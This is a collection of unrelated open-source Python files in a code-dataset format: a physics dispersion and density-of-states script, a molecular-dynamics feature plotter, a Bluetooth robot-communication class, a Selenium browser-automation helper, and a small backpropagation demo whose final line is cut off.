nu_fill=np.sum(np.heaviside(-energy_k_mu,1)*ds)/Vol_rec\n print(\"finished calculating filling for chemical potential\")\n print(\"Filling: {f} .... chemical potential: {m}\".format(f=nu_fill,m=mu))\n self.filling=nu_fill\n\n \n def Disp(self,kx,ky):\n \n [tp1,tp2]=self.hop\n DD2=0.5*(3*tp1+9*tp2) #multiplied by length squared\n ed=0.5*DD2*(kx**2+ky**2)\n return ed\n\n def Disp_mu(self,kx,ky):\n\n [tp1,tp2]=self.hop\n DD2=0.5*(3*tp1+9*tp2) #multiplied by length squared\n ed=0.5*DD2*(kx**2+ky**2)\n return ed-self.mu\n\n\n def Fermi_Vel(self,kx,ky):\n\n [tp1,tp2]=self.hop\n DD2=0.5*(3*tp1+9*tp2) #multiplied by length squared\n vx=DD2*kx\n vy=DD2*ky\n\n return [vx,vy]\n \n #if used in the middle of plotting will close the plot\n def FS_contour2(self, Np):\n theta = np.linspace(-np.pi,np.pi, Np)\n [tp1,tp2]=self.hop\n m=2/(3*tp1+9*tp2)\n \n kf=np.sqrt(2*self.EF*m)\n\n xFS_dense=kf*np.cos(theta)\n yFS_dense=kf*np.sin(theta)\n return [xFS_dense,yFS_dense]\n \n def FS_contour(self, Np):\n y = np.linspace(-4,4, 10603)\n x = np.linspace(-4,4, 10603)\n X, Y = np.meshgrid(x, y)\n Z = self.Disp_mu(X,Y) \n c= plt.contour(X, Y, Z, levels=[0]);\n plt.close()\n #plt.show()\n numcont=np.shape(c.collections[0].get_paths())[0]\n v = c.collections[0].get_paths()[0].vertices\n \n # if numcont==1:\n # v = c.collections[0].get_paths()[0].vertices\n # else:\n # contourchoose=0\n # v = c.collections[0].get_paths()[0].vertices\n # sizecontour_prev=np.prod(np.shape(v))\n # for ind in range(1,numcont):\n # v = c.collections[0].get_paths()[ind].vertices\n # sizecontour=np.prod(np.shape(v))\n # if sizecontour>sizecontour_prev:\n # contourchoose=ind\n # v = c.collections[0].get_paths()[contourchoose].vertices\n NFSpoints=Np\n chunksize=int(np.size(v[:,0])/NFSpoints)\n\n\n xFS_dense = v[::chunksize,0]\n yFS_dense = v[::chunksize,1]\n \n return [xFS_dense,yFS_dense]\n\n def deltad(self,x, epsil):\n return (1/(np.pi*epsil))/(1+(x/epsil)**2)\n\n def DOS(self,size_E, Npoi_ints):\n\n #DOMAIN OF THE DOS\n minE=self.bandmin-0.001*self.bandwidth\n maxE=self.bandmax+0.001*self.bandwidth\n earr=np.linspace(minE,maxE,size_E)\n\n #INTEGRATION LATTICE\n latt_int=Lattice.TriangLattice(Npoi_ints, False, self.Machine) #temp grid for integrating and getting filling\n \n # [KX,KY]=l.Generate_lattice()\n [KX,KY]=latt_int.read_lattice()\n Vol_rec=latt_int.Vol_BZ()\n ds=Vol_rec/np.size(KX)\n\n #DISPERSION FOR INTEGRAL\n energy_k = self.Disp(KX,KY)\n #parameter for delta func approximation\n epsil=0.002*self.bandwidth\n\n ##DOS \n Dos=[]\n for i in earr:\n dosi=np.sum(self.deltad(energy_k-i,epsil))*ds\n Dos.append(dosi)\n\n #FILLING FOR EACH CHEMICAL POTENTIAL\n ndens=[]\n for mu_ind in range(size_E):\n de=earr[1]-earr[0]\n N=np.trapz(Dos[0:mu_ind])*de\n ndens.append(N)\n nn=np.array(ndens)\n nn=nn/nn[-1]\n\n return [nn,earr,Dos]\n\n #######random functions\n def nf(self, e, T):\n rat=np.abs(np.max(e/T))\n if rat<700:\n return 1/(1+np.exp( e/T ))\n else:\n return np.heaviside(-e,0.5)\n\n def nb(self, e, T):\n rat=np.abs(np.max(e/T))\n if rat<700:\n return 1/(np.exp( e/T )-1)\n else:\n return -np.heaviside(-e,0.5)\n\n def PlotFS(self, lat):\n l=Lattice.TriangLattice(100,False )\n Npoi=1000\n Vertices_list, Gamma, K, Kp, M, Mp=l.FBZ_points(l.b[0,:],l.b[1,:])\n VV=np.array(Vertices_list+[Vertices_list[0]])\n [KxFS,KyFS]=self.FS_contour(Npoi)\n plt.plot(VV[:,0], VV[:,1],c='k')\n plt.scatter(KxFS, KyFS, s=1, c='r')\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n \n \ndef main() -> int:\n \n \n \n ##########################\n ##########################\n # parameters\n ##########################\n ##########################\n\n # # #electronic parameters\n J=2*5.17 #in mev\n tp1=568/J #in units of Js\\\n tp2=-tp1*108/568 #/tpp1\n ##coupling \n U=4000/J\n g=100/J\n Kcou=g*g/U\n # fill=0.67 #van hove\n fill=0.5\n size_E=4000\n \n\n ##########################\n ##########################\n # Geometry/Lattice\n ##########################\n ##########################\n\n save=True\n Machine='FMAC'\n \n # ##########################\n # ##########################\n # # Fermi surface and structure factor\n # ##########################\n # ##########################\n\n ed=Dispersion_TB_single_band([tp1,tp2],fill,size_E,Machine)\n [dens2,bins,valt,f2 ]=[ed.dens2,ed.bins,ed.valt,ed.f2 ]\n [nn,earr,Dos]=[ed.nn,ed.earr,ed.Dos]\n mu=ed.mu\n plt.plot(earr,Dos)\n plt.show()\n \n \nif __name__ == '__main__':\n sys.exit(main()) # next section explains the use of sys.exit\n","repo_name":"MendezV/linear_pdcro2","sub_path":"Dispersion.py","file_name":"Dispersion.py","file_ext":"py","file_size_in_byte":17727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74887525280","text":"# Plot features\nfrom msmbuilder.io import load_trajs\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib.pylab import plt\nimport sys\nimport seaborn as sns\ncolors = sns.color_palette(\"colorblind\", 8)\n\nfor feature in ['angles', 'dihedrals', 'bonds', 'contacts']:\n meta, ftraj = load_trajs('featurized_trajectories/{}-ftraj'.format(feature))\n ftraj = np.concatenate([traj for traj in ftraj.values()])\n\n if feature in ['angles', 'dihedrals']:\n sample = ftraj[np.random.choice(ftraj.shape[0], size=10000), :]\n sample = sample[:,np.arange(0,ftraj.shape[1], 2)]\n print(feature, sample.shape)\n elif feature in ['contacts']:\n sample = ftraj[np.random.choice(ftraj.shape[0], size=10000)]\n print(feature, sample.shape)\n else:\n sample = ftraj[np.random.choice(ftraj.shape[0], size=10000), :]\n print(feature, sample.shape)\n\n try:\n n_feats_plot = sample.shape[1]\n except IndexError:\n n_feat_plot = 1\n\n # BOX PLOT\n fig, axes = plt.subplots()\n\n axes.boxplot(sample,\n boxprops={'color': colors[0]},\n whiskerprops={'color': colors[0]},\n capprops={'color': colors[0]},\n medianprops={'color': colors[2]},\n )\n axes.set_xlabel(\"Feature Index\", fontsize=16)\n xx = np.arange(0, n_feats_plot, 10)\n axes.set_xticks(xx)\n axes.set_xticklabels([str(x) for x in xx])\n axes.set_xlim((0, n_feats_plot + 1))\n axes.set_ylabel(\"{} Value\".format(feature), fontsize=16)\n plt.savefig(\"figures/{}-features-box.pdf\".format(feature))\n\n variance = sample.var(axis=0)\n fig, axes = plt.subplots()\n try:\n index = np.arange(variance.shape[0])\n except IndexError:\n index = np.array([1])\n\n axes.bar(index, variance, align='center')\n axes.set_xlabel(\"Feature Index\", fontsize=16)\n xx = np.arange(0, n_feats_plot, 10)\n axes.set_xticks(xx)\n axes.set_xticklabels([str(x) for x in xx])\n axes.set_xlim((-0.5, n_feats_plot + 0.5))\n axes.set_ylabel(\"{} Variance\".format(feature), fontsize=16)\n plt.savefig(\"figures/{}-features-var.pdf\".format(feature))\n print('Finished {}'.format(feature))\n","repo_name":"RobertArbon/AADH_Analysis","sub_path":"CHARMM-OMM/MSM_Reactants_Only/All_Features_MSM/plot_features.py","file_name":"plot_features.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15557032731","text":"#!/usr/bin/python\r\nfrom bluetooth import *\r\nimport sys\r\nimport select\r\nimport time\r\n\r\ndef delay(ms):\r\n time.sleep(ms/1000)\r\n\r\n# Create global list of sockets\r\n# If a test program throws an exception and terminates, all handles to open sockets in the class will be lost\r\n# In this case, the only way to severe existing connections (and thus be able to make new ones) is to use this global list\r\n# To sever these connections after a program terminates without disconnecting, call severOldConnections()\r\n# So make sure that whatever file you're actually running includes the statement 'from BluetoothService import *'\r\n# This will ensure that the shell can see the below method after an unexpected termination\r\nglobalSockets = []\r\n\r\n#def severOldConnections():\r\n# for socket in globalSockets[:]:\r\n# socket.close()\r\n# globalSockets.remove(socket) \r\n\r\nclass BluetoothService:\r\n\r\n def __init__(self, enablePrint=True):\r\n self._discoveredDevices = {} # Dictionary mapping addresses to names for discovered devices\r\n self._addedDevices = {} # Dictionary mapping addresses to names for manually added devices\r\n self._sockets = {} # Dictionary mapping addresses to sockets\r\n \r\n def discoverDevices(self):\r\n \"\"\"\r\n Discover available bluetooth devices.\r\n\r\n It seems that if multiple devices are available with the same name, only one of them will be found.\r\n \r\n @return: A dictionary mapping addresses to names of the discovered devices\r\n @rtype: dict{str:str}\r\n \"\"\"\r\n print(\"Discovering Devices ...\")\r\n # Perform multiple discoveries since single scans seem to miss some devices\r\n # and the duration argument of discover_devices doesn't seem to work\r\n # Note discover_devices has a lookup_name argument but it crashes when set to true\r\n devices = {}\r\n addresses = []\r\n for i in range(1):\r\n newAddresses = discover_devices(duration=20) # 8-second discovery\r\n for address in newAddresses:\r\n if address not in addresses:\r\n addresses.append(address)\r\n # Look up names from addresses\r\n for address in addresses:\r\n name = ''\r\n try:\r\n name = lookup_name(address, timeout=30)\r\n except IOError:\r\n print('Error looking up name for address <' + str(address) + '>')\r\n devices[address] = name\r\n print(\"Found %d devices:\" % len(devices))\r\n for (address, name) in devices.items():\r\n print(\" <%s> at <%s>\" % (name, address))\r\n self._discoveredDevices = devices\r\n return devices.copy()\r\n\r\n def getDevices(self, nameFilters = ('')):\r\n \"\"\"\r\n Return the known devices (both discovered and manually added).\r\n Optionally, only return ones with names including the given terms.\r\n\r\n Will not perform a new discovery (see L{discoverDevices} for that).\r\n\r\n @param nameFilters: A list/tuple of terms which must be contained (case insensitive) in the returned device names.\r\n @type nameFilters: str or list/tuple or str\r\n\r\n @return: Dictionary mapping addresses to names\r\n @rtype: dict\r\n \"\"\"\r\n res = {}\r\n if not isinstance(nameFilters, (list, tuple)):\r\n nameFilters = [nameFilters]\r\n # Add devices that include the desired terms\r\n allDevices = dict(list(self._discoveredDevices.items()) + list(self._addedDevices.items()))\r\n for address in allDevices.keys():\r\n name = allDevices[address]\r\n for nameFilter in nameFilters:\r\n if name is None or len(name) == 0:\r\n if nameFilter in address:\r\n res[address] = name \r\n else:\r\n if nameFilter.lower() in name.lower():\r\n res[address] = name\r\n if len(nameFilters) == 0:\r\n res[address] = name\r\n return res\r\n\r\n def addDevice(self, address, name=''):\r\n \"\"\"\r\n Add a device to the list of available devices (as if it was discovered).\r\n\r\n @param address: The address of the device, of the format 'XX:XX:XX:XX:XX:XX'\r\n @type address: str\r\n\r\n @param name: The name of the device (optional)\r\n @type name: str\r\n \"\"\"\r\n if not isinstance(address, str) or not isinstance(name, str):\r\n return False\r\n # Try to get the name if none was provided\r\n if len(name) == 0:\r\n try:\r\n name = lookup_name(address)\r\n except IOError:\r\n print('Error looking up name for address <' + str(address) + '> (but will still add the address)')\r\n # Store the new device\r\n self._addedDevices[address] = name\r\n\r\n def clearDevices(self, added=True, discovered=True):\r\n \"\"\"\r\n Clears the known devices.\r\n\r\n @param added: Whether or not to clear the manually added devices (default True)\r\n @type added: boolean\r\n\r\n @param discovered: Whether or not to clear the discovered devices (default True)\r\n @type discovered: boolean\r\n \"\"\"\r\n if added:\r\n self._addedDevices = {}\r\n if discovered:\r\n self._discoveredDevices = {}\r\n\r\n def getAddress(self, name):\r\n \"\"\"\r\n Try to get the device address from the name. It must have already been added.\r\n\r\n If an address is given, will just return that address.\r\n\r\n @param address: The device name\r\n @type address: str\r\n\r\n @return: The address of the device, or an empty string if unknown\r\n @rtype: str\r\n \"\"\"\r\n if not isinstance(name, str):\r\n return False\r\n if name.count(':') == 5 and len(name.strip()) == 5 + 6*2:\r\n return name\r\n #print('\\tLooking up address of <%s>' % name)\r\n allDevices = self.getDevices()\r\n if name not in allDevices.values():\r\n print('\\t<%s> has not been discovered or added' % name)\r\n return ''\r\n for address in allDevices:\r\n if allDevices[address] == name:\r\n return address\r\n \r\n def connect(self, device, port=1, enablePrint=True):\r\n \"\"\"\r\n Connect to a device with the given name or address\r\n To use device name, the device must have already been discovered (see L{discoverDevices}).\r\n\r\n The device should already be added to the computer's list of known devices.\r\n The PIN for the device should have been stored on the computer when it was added.\r\n \r\n @param device: The name or address of the device to connect (case sensitive)\r\n @type device: str\r\n @param port: The port to use (optional)\r\n @type deviceName: int\r\n\r\n @return: Whether or not the connection was successful\r\n @rtype: boolean\r\n \"\"\"\r\n if not isinstance(device, str):\r\n return False\r\n if enablePrint:\r\n print('Connecting to <%s>' % device)\r\n # If a name was given, try to get its address\r\n device = self.getAddress(device)\r\n if len(device) == 0:\r\n return False\r\n # Create socket to use for connection (RFCOMM is default argument)\r\n socket = BluetoothSocket()\r\n connected = False\r\n # Try multiple times in case user is slow in following Windows prompt to add device\r\n # also, will try to disconnect and reconnect if already connected (maybe, not sure if this works)\r\n for count in range(4):\r\n if enablePrint:\r\n print('\\tTrying to connect...')\r\n if enablePrint:\r\n print('\\tIf prompted (on Windows), click to add device and enter PIN \\'1234\\'')\r\n try:\r\n socket.connect((device, port))\r\n connected = True\r\n break\r\n except IOError: # Got an error, probably either already connected or not been added to computer\r\n try:\r\n socket.close()\r\n except IOError:\r\n None\r\n socket = BluetoothSocket()\r\n # Check if connection was successful\r\n if connected:\r\n self._sockets[device] = socket\r\n globalSockets.append(socket)\r\n if enablePrint:\r\n print('\\tConnected to ' + device + '!')\r\n return True\r\n else:\r\n print('\\t*** Failed to connect to ' + device + ' ***')\r\n print('\\tPossible solution (on Windows):')\r\n print('\\t -- Open Show Bluetooth Devices')\r\n print('\\t -- Click Add a Device')\r\n print('\\t -- Select the device ' + device)\r\n print('\\t -- Enter PIN 1234')\r\n print('\\t -- Rerun this program') \r\n return False\r\n\r\n def disconnect(self, device, enablePrint=True):\r\n \"\"\"\r\n Disconect from the device with the given name or address. Will do nothing if no connection has been made.\r\n\r\n @param device: The name or address of the device to disconnect (case sensitive).\r\n @type device: str\r\n\r\n @return: Whether device was disconnected (whether device was valid)\r\n @rtype: boolean\r\n \"\"\"\r\n if not isinstance(device, str):\r\n return False\r\n if enablePrint:\r\n print('Disconnecting from <' + device + '>')\r\n # If a name was given, try to get its address\r\n device = self.getAddress(device)\r\n if len(device) == 0:\r\n return False\r\n # Disconnect device if a connection is stored\r\n if device not in self._sockets:\r\n return False\r\n socket = self._sockets[device]\r\n socket.close()\r\n del self._sockets[device]\r\n if socket in globalSockets:\r\n globalSockets.remove(socket)\r\n return True\r\n \r\n def send(self, device, message, enablePrint=False):\r\n \"\"\"\r\n Send data to the device with the given name or address.\r\n\r\n @param device: The name or address of the device (case sensitive)\r\n @type device: str\r\n\r\n @param message: The data to send. If it doesn't already end in '\\0', '\\0' will be appended.\r\n @type message: str or something which can be cast to str\r\n\r\n @return: Whether the data was sent.\r\n @rtype: boolean\r\n \"\"\"\r\n if not isinstance(device, str):\r\n return False\r\n if enablePrint:\r\n print('Sending <' + message + '> to <' + device + '>')\r\n message = str(message)\r\n # If a name was given, try to get its address\r\n device = self.getAddress(device)\r\n if len(device) == 0:\r\n return False\r\n # Check that a connection has been made\r\n if device not in self._sockets:\r\n if not self.connect(device):\r\n print('\\tHave not connected to <%s>' % device)\r\n return False\r\n # Check that message is null terminated (seems like this is done automatically in send but just in case)\r\n if message[-1] != '\\0':\r\n message += '\\0'\r\n # Send the message\r\n try:\r\n self._sockets[device].send(message)\r\n return True\r\n except IOError: # Stored socket is not actually open\r\n print('\\tNot connected to <%s>' % device)\r\n del self._sockets[device]\r\n return False\r\n\r\n def read(self, device, timeout=1000, enablePrint=True):\r\n \"\"\"\r\n Read data from the device with the given name or address.\r\n\r\n A connection must already have been made to the device (see L{connect}).\r\n\r\n @param device: The name or address of the device to poll (case sensitive)\r\n @type device: str\r\n\r\n @param timeout: The time to wait for a character before giving up, in milliseconds. Default is 1000.\r\n @type timeout: int\r\n\r\n @return: The data that was received, or an empty string if timeout was reached or device was not connected.\r\n @rtpe: str\r\n \"\"\"\r\n if not isinstance(device, str):\r\n return ''\r\n # If a name was given, try to get its address\r\n device = self.getAddress(device)\r\n if len(device) == 0:\r\n return ''\r\n # Check that a connection has been made\r\n if device not in self._sockets:\r\n print('\\tHave not connected to <%s>' % device)\r\n return ''\r\n # Check if there is data available\r\n try:\r\n ready = select.select([self._sockets[device]], [], [], timeout/1000)[0]\r\n except select.error: # Socket is not actually open\r\n print('\\tNot connected to <%s>' % device)\r\n del self._sockets[device]\r\n return ''\r\n # Read data until timeout is reached or data is terminated by null character\r\n # Due to bluetooth module timing, one call to 'read' may only get part of a string\r\n terminated = False\r\n data = ''\r\n timedout = False\r\n startTime = time.time()*1000\r\n while(ready and not terminated and not timedout):\r\n dataBytes = self._sockets[device].recv(1024)\r\n data += dataBytes.decode(\"utf-8\")\r\n if '\\0' in data:\r\n terminated = True\r\n if not terminated:\r\n ready = select.select([self._sockets[device]], [], [], 0.005 + timeout/1000)[0] # timeout arg for select is in seconds\r\n timedout = time.time()*1000 - startTime > timeout\r\n # Return data or empty string depending upon level of success\r\n if len(data) > 0 and terminated:\r\n data = data[0:-1]\r\n if enablePrint:\r\n print('Got data <' + data + '> from <' + device + '>')\r\n return data\r\n elif len(data) > 0 and not terminated:\r\n if enablePrint:\r\n print('Got data <' + data + '> from <' + device + '> but it did not terminate - be careful!')\r\n return data\r\n else:\r\n if enablePrint:\r\n print('Reached timeout trying to read from <' + device + '>')\r\n return ''\r\n\r\n\"\"\"\r\nSome test code...\r\n\"\"\"\r\nif __name__ == '__main__':\r\n bt = BluetoothService()\r\n bt.discoverDevices()\r\n \r\n devices = bt.getDevices()\r\n print('\\nFound devices: ')\r\n for (name, address) in devices.items():\r\n print(\" <%s> at <%s>\" % (name, address))\r\n\r\n robots = bt.getDevices(('robot', 'hc-', 'linvor','20:13:12:02:18:92'))\r\n print('\\nFound robot devices: ')\r\n toConnect = ''\r\n for (address, name) in robots.items():\r\n print(\" <%s> at <%s>\" % (name, address))\r\n toConnect = address\r\n\r\n ticker=0\r\n\r\n if bt.connect(toConnect):\r\n while(ticker < 11):\r\n bt.send(toConnect, \"Ticker:\" + str(ticker)+'\\0')\r\n # bt.read(toConnect)\r\n delay(1000)\r\n # bt.send(toConnect, 'Hello World!')\r\n # bt.read(toConnect)\r\n ticker = ticker + 1\r\n delay(3000)\r\n bt.disconnect(toConnect)\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"nichinglin/haptic_device_niching","sub_path":"python/BluetoothService.py","file_name":"BluetoothService.py","file_ext":"py","file_size_in_byte":15167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36870120492","text":"import platform,time, os\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.chrome.options import Options as OptionsChrome\r\nfrom selenium.webdriver.ie.options import Options as OptionsIE\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver import ActionChains\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.chrome.service import Service\r\n\r\nTIME_OUT_WEB=30\r\n\r\nclass SeleniumLayer: \r\n def __init__(self, log, dir_in, dir_path, dir_out):\r\n self.log = log\r\n self.dir_path = dir_path\r\n self.dir_in = dir_in\r\n self.dir_out = dir_out\r\n log = log\r\n\r\n def iniciar_driver_chrome(self): \r\n ###################### CHROME - DRIVER ######################\r\n # Path Chromedriver\r\n if (platform.system().lower()==\"linux\"): chrome_path='/usr/bin/chromedriver'\r\n elif (platform.system().lower()==\"windows\"): chrome_path=os.path.join(self.dir_path,\"chromedriver.exe\")\r\n\r\n # Capabillities - Options\r\n caps_chrome = DesiredCapabilities().CHROME\r\n caps_chrome[\"pageLoadStrategy\"] = \"normal\"\r\n opts_chrome = OptionsChrome()\r\n opts_chrome.add_argument(\"disable-infobars\")\r\n opts_chrome.add_argument(\"--disable-extensions\")\r\n opts_chrome.add_argument(\"no-sandbox\")\r\n opts_chrome.add_argument(\"disable-gpu\")\r\n opts_chrome.add_argument(\"lang=es\")\r\n opts_chrome.add_argument(\"test-type\")\r\n opts_chrome.add_argument(\"force-renderer-accessibility\")\r\n opts_chrome.add_argument(\"disable-web-security\")\r\n opts_chrome.add_argument(\"disable-extensions\")\r\n opts_chrome.add_argument(\"allow-insecure-localhost\")\r\n opts_chrome.add_argument(\"ignore-ssl-errors=yes\")\r\n opts_chrome.add_argument(\"ignore-certificate-errors\")\r\n opts_chrome.add_argument(\"--log-level=3\")\r\n opts_chrome.add_argument(\"safebrowsing-disable-download-protection\")\r\n prefs = {\"download.default_directory\" : self.dir_in}\r\n opts_chrome.add_experimental_option(\"prefs\",prefs)\r\n #####################################################\r\n\r\n self.log.debug(\"############### Inicio Cargar Chrome ###############\")\r\n inicio=time.time()\r\n self.log.debug (\"Chrome Caps: \")\r\n self.log.debug (caps_chrome)\r\n self.log.debug (\"Chrome Path: \"+ chrome_path)\r\n self.log.debug (\"Chrome Opts: \")\r\n self.log.debug (opts_chrome)\r\n try:\r\n self.log.debug (\"Iniciando WebDriver\")\r\n service = Service(executable_path= chrome_path)\r\n self.driver = webdriver.Chrome(service= service)\r\n self.driver.set_page_load_timeout(TIME_OUT_WEB*2)\r\n \r\n \r\n \r\n except Exception as e:\r\n self.log.error(\"Ocurrio un error con el ChromeDriver\")\r\n raise Exception(e)\r\n \r\n self.log.debug(\"## Tiempo transcurrido: \" + str(time.time()-inicio))\r\n self.log.debug(\"############### Fin Cargar Chrome ###############\")\r\n \r\n\r\n def quit_driver_chrome(self):\r\n self.driver.quit()\r\n\r\n def navegar_url_chrome(self, url):\r\n self.log.debug(\"############### Navegar URL ###############\")\r\n inicio=time.time() \r\n try:\r\n self.log.debug (\"Cargando url: \" + url)\r\n self.driver.get(url)\r\n except Exception as e:\r\n self.log.error(\"Ocurrio un error con el ChromeDriver\")\r\n raise Exception(e)\r\n \r\n\r\n def clear_visible_element_by_id(self, id):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.visibility_of_element_located((By.ID, id))\r\n ).clear()\r\n\r\n def click_visible_element_by_xpath(self, xpath):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.visibility_of_element_located((By.XPATH, xpath))\r\n ).click()\r\n\r\n def send_key_visible_element_by_id(self, id, data):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.visibility_of_element_located((By.ID, id))\r\n ).send_keys(data)\r\n \r\n def send_key_visible_element_by_name(self, name, data):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.visibility_of_element_located((By.NAME, name))\r\n ).send_keys(data) \r\n \r\n\r\n def click_visible_element_by_id(self, id):\r\n WebDriverWait(self.driver, TIME_OUT_WEB).until(\r\n EC.visibility_of_element_located((By.ID, id))\r\n ).click()\r\n\r\n def click_located_element_id(self, id):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.ID, id))\r\n ).click()\r\n \r\n def send_key_located_element_by_id(self, id, data):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.ID, id))\r\n ).send_keys(data)\r\n\r\n def select_by_value_located_by_id(self, id, value):\r\n Select(WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.ID, id))\r\n )).select_by_value(value)\r\n\r\n def select_by_value_located_by_xpath(self, xpath, value):\r\n Select(WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.XPATH, xpath))\r\n )).select_by_value(value)\r\n\r\n def check_exists_visible_element_by_id(self, id):\r\n try:\r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located((By.ID, id)))\r\n return len(elements)>0\r\n except:\r\n return False\r\n \r\n def check_exists_visible_element_by_xpath(self, xpath):\r\n try:\r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, xpath)))\r\n return len(elements)>0\r\n except:\r\n return False\r\n \r\n def check_exists_visible_element_by_name(self, name):\r\n try:\r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located((By.NAME, name)))\r\n return len(elements)>0\r\n except:\r\n return False\r\n \r\n def check_checkbox_is_selected_by_xpath(self, xpath):\r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located((By.XPATH, xpath)))\r\n return elements.is_selected()\r\n\r\n def get_exists_visible_element_by_xpath(self, xpath): \r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, xpath)))\r\n return elements\r\n\r\n def get_text_element(self, element): \r\n return element.text\r\n \r\n def download_imagen_by_xpath(self, xpath, path, element=None):\r\n \r\n if element == None:\r\n with open(path, 'wb') as file:\r\n file.write(WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.XPATH, xpath))\r\n ).screenshot_as_png)\r\n else:\r\n element.find_element(By.XPATH,xpath).screenshot(path)\r\n \r\n time.sleep(0.3)\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"renatolzr/RPAChallengeNYTime","sub_path":"selenium_util.py","file_name":"selenium_util.py","file_ext":"py","file_size_in_byte":7429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19266053151","text":"'''This script uses scikit-learn's blobs dataset to test the backprop code'''\n\nimport numpy as np\nfrom sklearn.datasets import make_blobs\n# import matplotlib.pyplot as plt\n\nX = np.array([1, 0])\ny = np.array([1])\n\nX, y = make_blobs(centers=2, random_state=42)\n# X, y = make_classification(n_features=2, n_redundant=0, n_informative=1,\n# n_clusters_per_class=1)\nprint(X.shape, y.shape)\n\n\n# plt.plot(X[:,0], X[:,1], 'bo')\n# plt.show()\n\n\ndef sigmoid(x):\n \"\"\"Calculates the sigmoid function\"\"\"\n return 1/(1+np.exp(-x))\n\n\ndef initialize_weights(n):\n \"\"\"Returns random weights\"\"\"\n # could try normal biases\n np.random.seed(42)\n weights = np.random.rand(n)*0.01\n weights = weights.reshape((3, 3))\n return weights\n\n\ndef loss(ytrue, ypred):\n \"\"\"returns a scalar that tells how far we are off\"\"\"\n return (ytrue-ypred)**2\n\n\ndef sigmoid_derivative(x):\n \"\"\"returns the values of sig'(x)\"\"\"\n sig = sigmoid(x)\n return sig*(1-sig)\n\n\ndef feed_forward(x, w, activation):\n \"\"\"Runs data through the neural network and returns a prediction\"\"\"\n # hidden layer\n in_data = np.array([x[:, 0], x[:, 1], np.ones(x.shape[0])])\n neuron1 = np.dot(in_data.T, w[0])\n n1 = activation(neuron1)\n neuron2 = np.dot(in_data.T, w[1])\n n2 = activation(neuron2)\n\n # output layer\n in2 = np.array([n1, n2, 1])\n output = np.dot(in2, w[2])\n\n ypred = activation(output)\n return (neuron1, neuron2, n1, n2, output, ypred)\n\n\ndef backprop(x, y, w, learning_rate, n_iter):\n \"\"\"Return optimized weights for the network\"\"\"\n for i in range(n_iter):\n # Calculate the output of both layers\n neuron1, neuron2, n1, n2, out, ypred = feed_forward(X, w, sigmoid)\n\n # Calculate the loss (difference of predicted and correct output)\n error = loss(y, ypred)\n\n # Modify each weight of the output layer by:\n # sig'(output) * loss * hidden_output\n oldw = w.copy()\n w[2, 0] -= sum(sigmoid_derivative(out)*n1*(ypred-y))*learning_rate\n w[2, 1] -= sum(sigmoid_derivative(out)*n2*(ypred-y))*learning_rate\n w[2, 2] -= sum(sigmoid_derivative(out) * 1*(ypred-y))*learning_rate\n\n # Calculate hidden_loss as sig'(output) * output_weight for each\n # hidden neuron\n # Modify each weight in the hidden layer by:\n # -sig'(hidden_output) * hidden_loss * input features\n # PROBLEM: doesn't backpropagate to hidden layer\n w[0, 0] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 0]\n * sigmoid_derivative(neuron1)*X[:, 0])*learning_rate\n w[0, 1] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 0]\n * sigmoid_derivative(neuron1)*X[:, 1])*learning_rate\n w[0, 2] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 0]\n * sigmoid_derivative(neuron1))*learning_rate\n w[1, 0] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 1]\n * sigmoid_derivative(neuron2)*X[:, 0])*learning_rate\n w[1, 1] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 1]\n * sigmoid_derivative(neuron2)*X[:, 1])*learning_rate\n w[1, 2] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 1]\n * sigmoid_derivative(neuron2))*learning_rate\n\n _, _, _, _, _, ypred = feed_forward(X, w, sigmoid)\n print(\"loss: \", sum(np.abs(loss(y, ypred))))\n\n return w\n\n\nif __name__ == '__main__':\n\n w = initialize_weights(9)\n w = backprop(X, y, w, 0.01, 1000)\n\n print(\"-\" * 40)\n print(\"FINAL RESULT:\")\n #print(\"X: \", X)\n #print(\"w: \", w)\n\n _, _, _, _, _, ypred = feed_forward(X, w, sigmoid)\n yp = np.round(ypred)\n # print(\"ypred: \", yp)\n\n acc = 1 - sum(np.abs(yp - y)) / 100\n 